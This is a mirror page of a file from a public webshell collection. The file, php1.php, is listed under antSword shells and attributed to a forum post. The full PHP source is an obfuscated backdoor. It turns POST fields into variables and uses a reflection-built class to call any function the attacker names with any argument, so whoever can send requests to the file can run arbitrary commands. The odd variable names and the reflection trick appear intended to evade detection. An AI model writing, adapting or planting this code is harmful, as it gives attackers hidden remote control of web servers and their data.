1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/antSword-shells/php1.php
tennc 5ab8c018a4 add php1.php
from : https://xz.aliyun.com/t/9218
Author: Isabellae
2021-08-15 16:12:59 +08:00

22 lines
337 B
PHP

<?php
class Test1
{
public function __construct($para, $_value)
{
$para($_value);
}
}
$class1 = new ReflectionClass("Test1");
foreach (array('_POST') as $_r1) {
foreach ($$_r1 as $_asadasd=>$_wfwefb) {
$$_asadasd =$_wfwefb;
}
}
$class2 = $class1->newInstance($_asadasd, $$_asadasd);